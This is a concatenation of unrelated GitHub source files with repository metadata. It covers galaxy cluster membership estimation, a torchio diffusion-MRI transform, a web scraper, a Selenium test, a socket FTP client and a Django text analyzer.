if rr == 20:
rFin = 3.0*r200
rFout = 3.8*r200
if rr == 30:
rFin = 5.*r200
rFout = 5.8*r200
if rr == 40:
rFin = 4.*r200
rFout = 4.8*r200
areaCL = np.pi * r200**2
areaF = np.pi * (rFout**2 - rFin**2)
norm = areaCL / areaF
galsCL = gals.query('(ra - @ra0)**2 + (dec - @dec0)**2 < (@r200)**2 & dered_r < @rmax & dered_r > @rmin & grModelColor < @grmax & grModelColor > @grmin')
galsF = gals.query('(ra - @ra0)**2 + (dec - @dec0)**2 < (@rFout)**2 & (ra - @ra0)**2 + (dec - @dec0)**2 > (@rFin)**2 & dered_r < @rmax & dered_r > @rmin & grModelColor < @grmax & grModelColor > @grmin')
#### Plots the Filed galaxies
plt.scatter(galsF['ra'], galsF['dec'], marker='o', color='black', s=4)
nameid = outname + '-fieldring.png'
plt.ylabel('DEC (degrees)')
plt.xlabel('RA (degrees)')
plt.savefig(nameid, format='png')
plt.close()
#### Plots the Cluster galaxies
plt.scatter(galsCL['ra'], galsCL['dec'], marker='o', color='black', s=4)
nameid = outname + '-clusterregion.png'
plt.ylabel('DEC (degrees)')
plt.xlabel('RA (degrees)')
plt.savefig(nameid, format='png')
plt.close()
####################################
NgalsF = float(len(galsF))
NgalsCL = float(len(galsCL))
r = galsCL['dered_r']
gr = galsCL['grModelColor']
xmin = r.min()
xmax = r.max()
ymin = gr.min()
ymax = gr.max()
print(xmin)
print(xmax)
print(ymin)
print(ymax)
print(norm)
X, Y = np.mgrid[xmin:xmax:100j, ymin:ymax:100j]
positions = np.vstack([X.ravel(), Y.ravel()])
values = np.vstack([r, gr])
kernelCL = stats.gaussian_kde(values)
galsCL['kdePDF'] = kernelCL.evaluate(values)
##############################################################################
### Field KDE
rField = galsF['dered_r']
grField = galsF['grModelColor']
valuesField = np.vstack([rField, grField])
kernelF = stats.gaussian_kde(valuesField)
galsCL['kdePDFfield'] = kernelF.evaluate(values) #### KDE PDF do FIELD calculada nos pontos correspondentes as galaxias do Cluster (contaminado)
############################ Probability that a given galaxy is a field galaxy using photoz as prior
galsCL['prob']=0.0
galsCL['member']=0.0
galsCL['prior']=0.0
meanerror = galsCL['Column3'].std()
print(meanerror)
galsclassrest = galsCL.reset_index(drop=True)
# for i in range(len(galsclass1)):
for i in range(len(galsCL)):
mu = galsCL['Column2'].values[i]
sigma = galsCL['Column3'].values[i]
integral = integrate.quad(gauss, z - 1*meanerror, z + 1*meanerror , args=(mu,sigma))
prior = 1 - integral[0]
#integral2 = integrate.quad(bigauss, -np.inf, np.inf , args=(mu,sigma, z, 0.03))
#prior2 = 1.0 - integral2[0]
galsCL['prior'].values[i] = prior
#galsclass1['prior2'][i] = prior2
galsCL['prob'].values[i] = norm * galsCL['kdePDFfield'].values[i] * NgalsF / (galsCL['kdePDF'].values[i] * NgalsCL) * prior
galsclassrest['prob'] = norm * galsclassrest['kdePDFfield'] * NgalsF / (galsclassrest['kdePDF'] * NgalsCL)
##############################################################################
####Plotting The dirty KDE
Z = np.reshape(kernelCL(positions).T, X.shape)
fig = plt.figure()
ax = fig.add_subplot(111)
figure = ax.imshow(np.rot90(Z), cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax])
#ax.plot(r, gr, 'k.', markersize=2)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
ax.scatter(r,gr, marker='.', s=1, color='black')
cbar = fig.colorbar(figure, ax=ax , use_gridspec=False)
nameid = outname + '-dirty.png'
plt.ylabel('g - r')
plt.xlabel('r')
cbar.set_label('PDF')
plt.savefig(nameid, format='png')
plt.close()
#plt.show()
#plt.figure()
df = galsCL.copy()
# df = df.append(galsclass1, ignore_index=True)
df = df.append(galsclassrest, ignore_index=True)
for m in range(1):
for i in range(int(len(df))):
fica=0
for mcmc in range(100):
if df['prob'][i] < random.uniform(0,1):
fica +=1
if fica >= 68: #1sigma
df['member'][i] = 1
objt=df['obj'][i]
wh=np.where((gals.ra == df.ra[i]) & (gals.dec == df.dec[i]))[0][0]
# wh=np.where((gals.obj == objt) ==True)[0]
gals.ClusterMember[wh]=1
else:
df['member'][i] = 0
wh=np.where((gals.ra == df.ra[i]) & (gals.dec == df.dec[i]))[0][0]
# wh=np.where((gals.obj == objt) ==True)[0]
gals.ClusterMember[wh]=2 #indica que nao esta no cluster mas esta em R200
final=gals.copy()
clean = df.query('member == 1')
it = str(m)
nameid = outname+'_clean.csv'
clean.to_csv(nameid)
nameid = outname+'_dirtyWprob.csv'
df.to_csv(nameid)
### Checks normalization of PDFS
kernelCL.integrate_box([-np.inf,-np.inf],[np.inf,np.inf],maxpts=None)
kernelF.integrate_box([-np.inf,-np.inf],[np.inf,np.inf],maxpts=None)
############################Plots the Field data plus the fitted KDE
ZF = np.reshape(kernelF(positions).T, X.shape)
fig = plt.figure()
ax = fig.add_subplot(111)
figure = ax.imshow(np.rot90(ZF), cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax])
#ax.plot(rclean, grclean, 'k.', markersize=2)
ax.set_xlim([xmin, xmax])
ax.set_ylim([ymin, ymax])
ax.scatter(rField,grField, marker='.', s=1, color='black')
cbar = fig.colorbar(figure, ax=ax , use_gridspec=False)
nameid = outname+ '-field.png'
plt.ylabel('g - r')
plt.xlabel('r')
cbar.set_label('PDF')
plt.savefig(nameid, format='png')
plt.close()
#plt.show()
##################################Plots the clean data plus the fitted KDE
rclean = clean['dered_r']
grclean = clean['grModelColor']
valuesclean = np.vstack([rclean, grclean])
kernelclean = stats.gaussian_kde(valuesclean)
Zclean = np.reshape(kernelclean(positions).T, X.shape)
fig = plt.figure()
ax = fig.add_subplot(111)
figure = ax.imshow(np.rot90(Zclean), cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax])
#ax.plot(rclean, grclean, 'k.', markersize=2)
ax.set_xlim([xmin, xmax])
ax.set_ylim([ymin, ymax])
ax.scatter(rclean,grclean, marker='.', s=1, color='black')
cbar = fig.colorbar(figure, ax=ax , use_gridspec=False)
nameid = outname + '-clean.png'
plt.ylabel('g - r')
plt.xlabel('r')
cbar.set_label('PDF')
plt.savefig(nameid, format='png')
plt.close()
#plt.show()
print('##############numeros')
print('areaCL')
print(areaCL)
print('areaF')
print(areaF)
print('norm')
print(norm)
print('NgalsF')
print(NgalsF)
print('NgalsCL')
print(NgalsCL)
print('NgalsF*norm')
print(NgalsF*norm)
############################################# Estimador da PDF clean
# estclean = (np.rot90(Z)*NgalsCL - np.rot90(ZF)*norm*NgalsF)/(NgalsCL - norm*NgalsF)
# fig = plt.figure()
# ax = fig.add_subplot(111)
# figure = ax.imshow(estclean, cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax])
# #ax.plot(rclean, grclean, 'k.', markersize=2)
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([ymin, ymax])
# #ax.scatter(rclean,grclean, marker='.', s=1, color='black')
# cbar = fig.colorbar(figure, ax=ax , use_gridspec=False)
# nameid = outname + '-theoryPDF.png'
# plt.ylabel('g - r')
# plt.xlabel('r')
# cbar.set_label('PDF')
# plt.savefig(nameid, format='png')
# plt.close()
# #plt.show()
############################################# Subtrai a PDF-clean calculada da Sorteada por MC
# dif = estclean - np.rot90(Zclean)
# fig = plt.figure()
# ax = fig.add_subplot(111)
# figure = ax.imshow(dif, cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax])
# #ax.plot(rclean, grclean, 'k.', markersize=2)
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([ymin, ymax])
# #ax.scatter(rclean,grclean, marker='.', s=1, color='black')
# cbar = fig.colorbar(figure, ax=ax , use_gridspec=False)
# nameid = cl + '-theoryPDF-cleanPDF.png'
# plt.ylabel('g - r')
# plt.xlabel('r')
# cbar.set_label('theoretical PDF - clean sample PDF')
# plt.savefig(nameid, format='png')
# plt.close()
return final | NataliaDelCoco/FilamentAnalysis | KDE_RS_V2.py | KDE_RS_V2.py | py | 9,660 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.sqrt",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.pi",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "numpy.exp",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.pi",
"line_number": 54,
... |
36808295769 | import copy
from typing import Tuple, Union
from numbers import Number
import torchio as tio
from torchio.transforms.augmentation import RandomTransform
import torch
import numpy as np
class ReconstructMeanDWI(RandomTransform):
def __init__(
self,
full_dwi_image_name: str = "full_dwi",
mean_dwi_image_name: str = "mean_dwi",
bvec_name: str = "grad",
num_dwis: Union[int, Tuple[int, int]] = 15,
num_directions: Union[int, Tuple[int, int]] = 1,
directionality: Union[Number, Tuple[Number, Number]] = 4,
bval_range: Tuple[Number, Number] = (1e-5, 501.0),
**kwargs
):
super().__init__(**kwargs)
self.full_dwi_image_name = full_dwi_image_name
self.mean_dwi_image_name = mean_dwi_image_name
self.bvec_name = bvec_name
self.num_dwis = num_dwis
self.num_directions = num_directions
self.directionality = directionality
self.bval_range = bval_range
self.args_names = ("full_dwi_image_name", "mean_dwi_image_name", "bvec_name", "num_dwis", "num_directions",
"directionality", "bval_range")
def apply_transform(self, subject: tio.Subject) -> tio.Subject:
if self.full_dwi_image_name not in subject:
return subject
full_dwi_image = subject[self.full_dwi_image_name]
full_dwi = full_dwi_image.data.numpy()
grad = full_dwi_image[self.bvec_name].numpy()
bvals = grad[:, 3]
bvecs = grad[:, :3]
mask = (bvals > self.bval_range[0]) & (bvals < self.bval_range[1])
bvecs = bvecs[mask]
full_dwi = full_dwi[mask]
num_dwis = self.get_num_dwis()
num_directions = self.get_num_directions()
directionality = self.get_directionality()
random_directions = np.random.randn(3, num_directions)
random_directions = random_directions / np.linalg.norm(random_directions, axis=0, keepdims=True)
sample_probabilities = np.max(np.abs(bvecs @ random_directions) ** directionality, axis=1)
sample_probabilities = sample_probabilities / sample_probabilities.sum()
indices = np.arange(full_dwi.shape[0])
indices = np.random.choice(indices, size=num_dwis, p=sample_probabilities)
mean_dwi = np.mean(full_dwi[indices], axis=0, keepdims=True)
if self.mean_dwi_image_name in subject:
mean_dwi_image = subject[self.mean_dwi_image_name]
else:
mean_dwi_image = copy.deepcopy(full_dwi_image)
subject.add_image(mean_dwi_image, self.mean_dwi_image_name)
mean_dwi_image.set_data(mean_dwi)
return subject
def get_num_dwis(self):
if isinstance(self.num_dwis, int):
return self.num_dwis
elif isinstance(self.num_dwis, Tuple):
low, high = self.num_dwis
sample = np.random.rand()
sample = sample ** 2
sample = sample * (high - low + 1) + low
sample = int(sample)
return sample
else:
raise ValueError(f"Unexpected type {type(self.num_dwis)} for num_dwis")
def get_num_directions(self):
if isinstance(self.num_directions, int):
return self.num_dwis
elif isinstance(self.num_directions, Tuple):
return np.random.randint(self.num_directions[0], self.num_directions[1] + 1)
else:
raise ValueError(f"Unexpected type {type(self.num_directions)} for num_directions.")
def get_directionality(self):
if isinstance(self.directionality, Number):
return self.directionality
elif isinstance(self.directionality, Tuple):
return np.random.uniform(self.directionality[0], self.directionality[1])
else:
raise ValueError(f"Unexpected type {type(self.directionality)} for directionality")
def is_invertible(self):
return False
class ReconstructMeanDWIClassic(RandomTransform):
"""Reconstructs Mean Diffusion Weighted Images. `subset_size` gradients are first selected based
on their distance to a randomly chosen gradient direction. A random number of images in this subset
are averaged.
Args:
bvec_name: Key for the bvec Tensor in the image dictionary
subset_size: Upper bound of the uniform random variable of images to average
"""
def __init__(
self,
full_dwi_image_name: str = "full_dwi",
mean_dwi_image_name: str = "mean_dwi",
bvec_name: str = "grad",
subset_size: int = 15,
bval_range: Tuple[float, float] = (1e-5, 501.0),
**kwargs
):
super().__init__(**kwargs)
self.full_dwi_image_name = full_dwi_image_name
self.mean_dwi_image_name = mean_dwi_image_name
self.bvec_name = bvec_name
self.subset_size = subset_size
self.bval_range = bval_range
self.args_names = ("full_dwi_image_name", "mean_dwi_image_name", "bvec_name", "subset_size", "bval_range")
def apply_transform(self, subject: tio.Subject) -> tio.Subject:
if self.full_dwi_image_name not in subject:
return subject
full_dwi_image = subject[self.full_dwi_image_name]
full_dwi = full_dwi_image.data
grad = full_dwi_image[self.bvec_name]
bvals = grad[:, 3]
bvecs = grad[:, :3]
mask = (bvals > self.bval_range[0]) & (bvals < self.bval_range[1])
bvecs = bvecs[mask]
full_dwi = full_dwi[mask]
rand_bvec = bvecs[np.random.randint(bvecs.shape[0])]
dist = torch.sum((bvecs - rand_bvec) ** 2, dim=1)
closest_indices = np.argsort(dist)[: self.subset_size]
number_of_selections = np.random.randint(low=1, high=self.subset_size)
ids = torch.randperm(closest_indices.shape[0])[:number_of_selections]
selected_indices = closest_indices[ids]
mean_dwi = torch.mean(full_dwi[selected_indices], dim=0)
if self.mean_dwi_image_name in subject:
mean_dwi_image = subject[self.mean_dwi_image_name]
else:
mean_dwi_image = copy.deepcopy(full_dwi_image)
subject.add_image(mean_dwi_image, self.mean_dwi_image_name)
mean_dwi_image.set_data(mean_dwi.unsqueeze(0))
return subject
def is_invertible(self):
return False
| efirdc/Segmentation-Pipeline | segmentation_pipeline/transforms/reconstruct_mean_dwi.py | reconstruct_mean_dwi.py | py | 6,434 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torchio.transforms.augmentation.RandomTransform",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"line_number": 17,
"usage_type": "name"
},
{
"api_nam... |
34773386089 | from flask import Flask, render_template
from bs4 import BeautifulSoup
import requests, json
def scrapCars():
source = requests.get('https://www.izmostock.com/car-stock-photos-by-brand').text
soup = BeautifulSoup(source, 'lxml')
my_table = soup.find('div', {'id': 'page-content'})
links = my_table.findAll('span')
cars = []
for link in links:
cars.append(link.text)
with open ('data.json', 'w', encoding='utf-8') as f:
json.dump(cars, f, ensure_ascii=False, indent=4)
| tech387-academy-python/PythonAppDemo | webscraper.py | webscraper.py | py | 537 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 21,
"usage_type": "call"
}
] |
4489955191 | """
Name : test_addmember.py
Author : Tiffany
Time : 2022/8/1 19:02
DESC:
"""
import time
import yaml
from faker import Faker
from selenium import webdriver
from selenium.common import StaleElementReferenceException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
class TestAddMemberFromeContact:
def setup_class(self):
fake = Faker("zh_CN")
self.username = fake.name()
self.acctid = fake.ssn()
self.mobile = fake.phone_number()
# 实例化
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(5)
self.driver.maximize_window()
# 一.登录
# 1.访问企业微信登录页面
self.driver.get("https://work.weixin.qq.com/wework_admin/loginpage_wx?from=myhome")
# 2.获取本地的cookie记录
cookie = yaml.safe_load(open("../data/cookies.yaml"))
# 3.植入cookie
for c in cookie:
self.driver.add_cookie(c)
time.sleep(3)
# 4.重新访问企业微信首页
self.driver.get("https://work.weixin.qq.com/wework_admin/loginpage_wx?from=myhome")
def teardown_class(self):
pass
def test_addmember(self):
"""通讯录页面:添加成员"""
# 点击通讯录按钮
self.driver.find_element(By.ID, "menu_contacts").click()
# 点击添加成员按钮
time.sleep(5)
attempts = 0
while attempts < 3:
try:
self.driver.find_element\
(By.XPATH, '//*[@id="js_contacts82"]/div/div[2]/div/div[2]/div[3]/div[1]/a[1]').click()
time.sleep(5)
self.driver.find_element(By.ID, "username").send_keys(self.username)
self.driver.find_element(By.ID, "memberAdd_acctid").send_keys(self.acctid)
self.driver.find_element(By.ID, "memberAdd_phone").send_keys(self.mobile)
self.driver.find_elements(By.CLASS_NAME, "js_btn_save")[0].click()
break
except StaleElementReferenceException:
attempts += 1
# 输入姓名、账号、手机
# 点击保存按钮
# 4.断言结果
loc_tips = (By.ID, "js_tips")
WebDriverWait(self.driver, 10, 2).until(expected_conditions.visibility_of_element_located(loc_tips))
tips_value = self.driver.find_element(*loc_tips).text
assert tips_value == "保存成功"
def test_dept_contact(self):
"""通讯录页面:添加部门"""
# 点击通讯录菜单
self.driver.find_element(By.ID, "menu_contacts").click()
# 点击加号
self.driver.find_element(By.XPATH, "//i[@class='member_colLeft_top_addBtn']").click()
# 点击添加部门
self.driver.find_element(By.XPATH, "//a[text()='添加部门']").click()
# 填写部门名称
self.driver.find_element(By.XPATH, "//input[@name='name']").send_keys(self.username)
# 选择所属部门
self.driver.find_element(By.XPATH, "//span[@class='js_parent_party_name']").click()
self.driver.find_element(By.XPATH, "//div[@class='inputDlg_item']//a[text()='加加加']").click()
# 点击确定按钮
self.driver.find_element(By.XPATH, "//a[text()='确定']").click()
# 断言结果
loc_tips = (By.ID, "js_tips")
WebDriverWait(self.driver, 10, 2).until(expected_conditions.visibility_of_element_located(loc_tips))
tips_value = self.driver.find_element(*loc_tips).text
assert tips_value == "新建部门成功"
pass
| TiffanyWang1108/web_camp | prepare/test_case/test_addmember.py | test_addmember.py | py | 3,698 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "faker.Faker",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "yaml.safe_lo... |
39060387909 | from numpy import arange,log,exp,r_
from matplotlib import pyplot as plt
from scipy.special import gamma
import Cua2008
from numpy import fft,sin,pi
from numpy.random import normal
duration=60
hf_dt=0.01
mean=0.0
std=1.0
num_samples = int(duration/hf_dt)
t=arange(0,duration,hf_dt)
noise = normal(mean, std, size=num_samples)
freq=0.1
freq2=20.0
noise=sin(2*pi*t*freq+pi/4)+sin(2*pi*t*freq2+pi/6)
ft=fft.rfft(noise)
f=fft.rfftfreq(len(noise),hf_dt)
# GP window
Tw=duration
epsilon=0.2
eta=0.05
b=-epsilon*log(eta)/(1+eta*(log(epsilon)-1))
c=b/(epsilon*Tw)
#a=(exp(1)/(epsilon*Tw))**b
a=(((2*c)**(2*b+1))/gamma(2*b+1))**0.5
w=a*t**b*exp(-c*t)
plt.figure()
plt.plot(r_[0,t+10],r_[0,w])
#fft
#Cua window
i = 0 # Horizontal P-wave acceleration - rock:
i = 6 # Vertical P-wave acceleration - rock:
i = 12 # Horizontal S-wave acceleration - rock: **BAD #<-- S-wave alpha_t_rise for i=12 should be 0.064 instead of 0.64?
i = 19 # Vertical S-wave acceleration - soil:
M=5
R=10
TT=10
env=Cua2008.envelope(M,R,t,TT,Pcoeff=0,Scoeff=12)
plt.figure()
plt.plot(t,env)
plt.show() | Ogweno/mylife | misc/windowing_test.py | windowing_test.py | py | 1,076 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.arange",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.random.normal",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.sin",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.pi",
"line_numbe... |
33453047943 | from __future__ import print_function
import socket
import sys
import os
import re
import logging
import datetime
"""
FTPClient object requires:
- HOST (IP address or domain)
- PORT (Integer value between 0-99999)
- COMMANDS (List of Strings: LIST|PUT|GET followed by filename)
CTRL+C to exit client
"""
EXAMPLE_INPUT = "\n - Example input: python client.py <domain/ip> <port> <put filename|get filename|list>"
class FTPClient:
def __init__(self, host, port, command):
logging.basicConfig(filename='client.log', level=logging.DEBUG)
self.cli_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.host = self.check_host(host)
self.port = self.check_port(port)
self.command = self.check_command(command)
self.connected = False
self.protocol_commands = {
"put": self.put_file,
"get": self.get_file,
"list": self.show_list
}
self.protocol_errors = {
"FileAlreadyExists": "File already exists in current directory",
"FileNotFound": "File could not be found in current directory",
"FileTooLarge": "File is too large to transfer (over 5GB in size)",
"FileZeroSized": "File is a zero-sized file (does not contain data)",
"FileNameTooLong": "Filename of file is too long (over 255 chars)",
"FileIsDirectory": "File is actually a directory (folder containing files)"
}
self.protocol_messages = {
"FileOkTransfer": "No existing file present, OK to create new file.",
"FileSizeReceived": "The filesize of file being transferred has successfully been received."
}
def log(self, ctype, message):
# Logs passed message with date and time to client.log
date = str(datetime.datetime.now()).split(".")[0]
line = "[%s] %s" % (ctype, message)
logging.info("%s | %s" % (date, line))
if ctype == "ERR":
try:
self.disconnect()
except OSError:
pass
raise SystemExit("[ERR] %s" % message)
print(line)
@staticmethod
def get_filesize(size_bytes):
# Converts bytes to larger suffix
# Returns converted filesize as a string
sizes = ['B', 'KB', 'MB', 'GB']
i = 0
while size_bytes > 1024 and i < 5:
size_bytes = size_bytes / 1024.00
i += 1
return "%0.2f%s" % (size_bytes, sizes[i])
# Arguement Checkers
def check_command(self, command):
cmd_type = command[0].lower()
if cmd_type not in ["list", "put", "get"]:
self.log("ERR", "The parameter %s is not supported by this client. Try: %s" % (cmd_type, EXAMPLE_INPUT))
if (cmd_type == "put" or cmd_type == "get") and len(command) != 2:
self.log("ERR",
"The \"%s\" command must be followed by the <filename> field. Try: %s" % (cmd_type, EXAMPLE_INPUT))
return command
def check_host(self, host):
if host.lower() != "localhost" and (" " in host or not re.match(r"^[a-zA-Z0-9_.-]*$", host)):
self.log("ERR", "The domain/IP address provided contains spaces and/or special characters. " +
"Allowed characters: letters, numbers, periods, dashes and underscores.")
return host
def check_port(self, port):
if not port.isdigit() or not (1 <= len(port) <= 5):
self.log("ERR", "The port parameter that has been provided is too short/long or is not a numerical value")
if int(port) < 0:
self.log("ERR", "The port parameter that has been provided is not a positive numerical value")
return int(port)
def start(self):
self.log("OK!", "Client startup initialised.")
# Parse command list and check if valid command. Also, check if command needs the parameter filename
if self.command[0] == "list":
self.protocol_commands[self.command[0]]()
else:
self.protocol_commands[self.command[0]](filename=self.command[1])
# After command execution, notify server of disconnect and close socket on client side.
# self.disconnect()
def connect(self):
try:
# Try connect to server. If connection refused, log and raise SystemExit
self.cli_socket.connect((self.host, self.port))
self.log("CON", "Successfully connected to server at: %s:%s" % (self.host, self.port))
self.connected = True
except (socket.gaierror, ConnectionRefusedError) as e:
self.cli_socket.close()
self.log("ERR", "An error occurred when connecting to host %s:%s\n%s" % (self.host, self.port, str(e)))
def disconnect(self):
# Notify server of disconnect, then close client.
if self.connected:
self.connected = False
self.cli_socket.send(b"DISCONNECT")
self.log("DIS", "Disconnected from server.")
# Command execution
def put_file(self, filename):
# Check file/filename for security/file issues
if filename not in os.listdir(os.getcwd()):
self.cli_socket.sendall(b"FileNotFound")
self.log("ERR", "FileNotFound: " + self.protocol_errors["FileNotFound"] + " (server).")
elif len(filename) > 255:
self.cli_socket.sendall(b"FileNameTooLong")
self.log("ERR", "FileNameTooLong: " + self.protocol_errors["FileNameTooLong"])
elif os.path.isdir('%s/%s' % (os.getcwd(), filename)):
self.cli_socket.sendall(b"FileIsDirectory")
self.log("ERR", "FileIsDirectory: " + self.protocol_errors["FileIsDirectory"])
elif os.path.getsize(('%s/%s' % (os.getcwd(), filename))) > 5368709120:
self.cli_socket.sendall(b"FileTooLarge")
self.log("ERR", "FileTooLarge: " + self.protocol_errors["FileTooLarge"])
elif os.path.getsize(('%s/%s' % (os.getcwd(), filename))) == 0:
self.cli_socket.sendall(b"FileZeroSized")
self.log("ERR", "FileZeroSized: " + self.protocol_errors["FileZeroSized"])
else:
self.log("OK!", "File '%s' found in client directory. Sending server total file-size." % filename)
self.connect()
self.cli_socket.sendall(("PUT " + filename).encode())
# send client the filesize of file being sent.
response = self.cli_socket.recv(24).decode()
if response in self.protocol_errors:
self.log("ERR", "Server response: \"%s\" - %s" % (response, self.protocol_errors[response]))
elif response in self.protocol_messages:
filesize = str(os.path.getsize(os.getcwd() + '/' + filename))
self.cli_socket.sendall(filesize.encode())
max_size = self.get_filesize(int(filesize))
bytes_sent = 0
upload = open(os.getcwd() + '/' + filename, 'rb')
data = upload.read(4096)
while data:
bytes_sent += len(data)
current_size = self.get_filesize(bytes_sent)
print("[UPL] Uploading '%s' [%s / %s]\t" % (filename, current_size, max_size), end='\r')
self.cli_socket.sendall(data)
data = upload.read(4096)
self.log("UPL", "Upload Complete '%s' [%s / %s]" % (filename, current_size, max_size))
def get_file(self, filename):
# send GET request to server, w/ filename
self.log("CMD", "Invoking Server Protocol 'GET' command with filename: %s" % filename)
# If filename exists in client directory, do not continue
if filename in os.listdir(os.getcwd()):
self.log("ERR", "FileAlreadyExists: " + self.protocol_errors["FileAlreadyExists"] + " (client).")
self.connect()
self.cli_socket.sendall(("GET " + filename).encode())
# If server responds with a protocol error, log and raise SystemExit
response = self.cli_socket.recv(1024).decode()
if response in self.protocol_errors:
self.log("ERR", "Server response: \"%s\" - %s" % (response, self.protocol_errors[response]))
elif response in self.protocol_messages:
self.log("OK!", "Server response: \"%s\" - %s" % (response, self.protocol_messages[response]))
# Else server has resonded with filesize. Continue with downloading file.
file_size = int(response)
bytes_collected = 0
max_size = self.get_filesize(file_size)
download_file = open(filename, 'wb')
# Write downloded byte data to a file named by filename received form server.
while bytes_collected < file_size:
data = self.cli_socket.recv(4096)
bytes_collected += len(data)
current_size = self.get_filesize(bytes_collected)
download_file.write(data)
print("[DWN] Downloading '%s' [%s / %s]" % (filename, current_size, max_size), end='\r')
# Once filesize matches the downloaded bytes we have received, close file (download complete).
download_file.close()
self.log("DWN", "Download Complete '%s' [%s / %s]" % (filename, current_size, max_size))
self.log("OK!", "File saved to: %s/%s" % (os.getcwd(), filename))
def show_list(self):
# send LIST request to server, w/ no other parameters.
self.log("CMD", "Invoking Server Protocol 'LIST' command.")
self.connect()
self.cli_socket.sendall("LIST".encode())
# If response is empty, log and raise SystemExit. Else, print response.
response = self.cli_socket.recv(16384)
if response:
self.log("OK!", "Server responded with:\n%s" % response.decode())
else:
self.log("ERR", "Server responded without a file list.")
if __name__ == '__main__':
if len(sys.argv) < 4:
raise SystemExit("[ERR] The domain/IP and port parameters are required:\n" + EXAMPLE_INPUT)
client = FTPClient(host=sys.argv[1], port=sys.argv[2], command=sys.argv[3:])
client.start()
| denBot/clientserver-ftp-sockets-demo | src/client.py | client.py | py | 10,207 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.basicConfig",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "socket.socket",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "socket.AF_INET",... |
39883705611 | import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
h, k_up1, k_up2 = np.loadtxt('./Reactions/Kup.dat',skiprows=3,usecols=(1,5799+1,5800+1),unpack=True)
h *= 1e-5
k_up = k_up1 + k_up2
plt.xscale('log')
plt.plot(k_up,h,'k-')
plt.savefig('./N2O-rates.pdf',bbox_inches='tight')
| aheays/spectr_examples | argo/data/early_earth/out/plot-k.py | plot-k.py | py | 320 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "numpy.loadtxt",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.xscale",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot... |
18550396896 | from django.http import HttpResponse
from django.shortcuts import render
def index(request):
#params = {'name':'Tarbi'}
return render(request,"index.html")
def analyze(request):
#Get the text
djtext = request.POST.get('text','default')
#Operations
removepunc = request.POST.get('removepunc','default')
fullcaps = request.POST.get('fullcaps','default')
count = request.POST.get('count','default')
newlineremover = request.POST.get('newlineremover','default')
spaceremover = request.POST.get('spaceremover','default')
#Result text
analyzed = ""
if removepunc == "on":
punctuations = '''!()-[]{};:'"\,<>./?@#$%^&*_~'''
analyzed = ""
for char in djtext:
if char not in punctuations:
analyzed = analyzed + char
params = {'purpose': 'Remove Punctuations', 'analyzed_text': analyzed,'input_text': djtext}
djtext = analyzed
#return render(request, 'analyze.html', params)
if fullcaps == "on":
analyzed = djtext.upper()
params = {'purpose': 'To Upper Case', 'analyzed_text': analyzed, 'input_text': djtext}
djtext = analyzed
#return render(request, 'analyze.html', params)
if count == "on":
cnt = 0
analyzed = ""
for x in djtext:
if(x.isdigit()):
continue
analyzed+=x
params = {'purpose': 'Number Remover', 'analyzed_text': analyzed, 'input_text': djtext}
djtext = analyzed
#return render(request, 'analyze.html', params)
if newlineremover == "on":
analyzed = ""
for x in djtext:
if x != '\n' and x!='\r':
analyzed+=x
params = {'purpose': 'New Line Remove', 'analyzed_text': analyzed, 'input_text': djtext}
djtext = analyzed
#return render(request, 'analyze.html', params)
if spaceremover =="on":
analyzed =""
for x in djtext:
if(x!=' '):
analyzed+=x
params = {'purpose': 'Space Remove', 'analyzed_text': analyzed, 'input_text': djtext}
djtext = analyzed
if spaceremover !="on" and newlineremover != "on" and count != "on" and fullcaps != "on" and removepunc != "on":
return HttpResponse("Select any option and try again")
return render(request, 'analyze.html', params)
def about(request):
return render(request, 'about.html')
def contact(request):
return render(request, 'contact.html')
| Bibhash7/Textlyzer | mysite/views.py | views.py | py | 2,508 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.render",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.http.HttpResponse",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
"line_number": 69,
"usage_type": "call"
},
{
"api_name"... |
39666743662 | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 14 20:18:14 2017
@author: user
"""
import csv
import numpy as np
from gensim.models import word2vec
